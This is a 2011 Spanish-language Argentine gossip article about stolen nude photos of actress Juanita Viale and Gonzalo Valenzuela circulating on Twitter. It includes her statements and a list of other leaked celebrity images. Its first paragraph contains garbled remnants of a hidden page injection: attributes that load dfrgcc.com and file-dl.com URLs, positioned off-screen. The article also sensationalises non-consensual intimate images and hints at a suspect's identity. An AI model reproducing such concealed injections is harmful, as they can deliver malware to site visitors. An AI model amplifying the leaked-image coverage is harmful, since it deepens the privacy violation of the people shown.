18/07/2011, medios

Pantalla caliente: aparecieron fotos de Juanita Viale y Gonzalo Valenzuela desnudos en la intimidad

En la tarde del domingo, se difundieron por Twitter imágenes hot de Juanita Viale y Gonzalo Valenzuela (FOTO). Ambos aparecen en la web con unas fotos caseras, con sus cuerpos desnudos y teniendo relaciones. “Las fotos nos pertenecen y fueron robadas junto con un celular hace meses. Son privadas”, confirmó la nieta de Mirtha Legrand. / src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

En medio de una polémica sobre los límites entre la vida privada y el vacío legal en la difusión de imágenes por Internet, aparecieron nuevas fotos polémicas. Esta vez se trata de unas imágenes caseras en la red de Juanita Viale y Gonzalo "Manguera" Valenzuela, en que se los ve totalmente desnudos.

Lo cierto es que la nieta de Mirtha Legrand se hizo cargo de sus fotos prohibidas que circulan desde ayer en varios espacios virtuales.

"Las fotos nos pertenecen y fueron robadas junto con un celular hace meses. Son privadas", dijo la actriz al Diario Libre.

Las imágenes habrían sido tomadas en 2009 y ahora están averiguando quién fue la persona que las subió a la web.

"Tenemos una pista concreta porque sabemos quién es la persona que las subió al portal. Sus iniciales son AR y es un egresado universitario de la UBA", agregó la morocha.

Además, Juanita aseguró que presentará una denuncia penal y un amparo judicial para proteger la intimidad de la pareja.

"Esto es objeto de un ilícito y me produce repugnancia. He sufrido mucho últimamente y mi vida es objeto de examen permanente. En este caso, hay un límite que no debiera cruzarse", sostuvo.

Otro caso y van...

Desde que Graciela Alfano, la polémica jurado de Bailando 2011, inauguró la moda de subir las fotos hot al Twitter, se inició una seguidilla de exposición mediática de otros famosos en poses hot.

Una de las primeras víctimas es Silvina Escudero, cuya foto prohibida fue subida a un portal con contenidos pornográficos y de allí se diseminó por la web.

Luego apareció la foto de un desnudo del ex nadador José Meolans. Más tarde, el escándalo siguió por las fotos, embarazada y desnuda, de Karina Mazzoco. También pudimos ver fotos osadas de Romina Ricci y de Karina Jelinek.

Y ahora, también a través de Twitter dieron a conocer fotos eróticas de Juanita Viale y Gonzalo Valenzuela. La pareja, que recientemente fue polémica por una infidelidad de la ex protagonista de Malparida, aparece en varias fotos de alto contenido erótico.

En las imágenes, aparecen totalmente desnudos y en algunas tomas teniendo sexo y ya dieron vuelta por todos lados a través de las redes sociales. Una vez más, la vida familiar de la nieta de Mirtha Legrand se alterará con la publicación de estas fotografías hot.


Fuente: PrimiciasYa



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy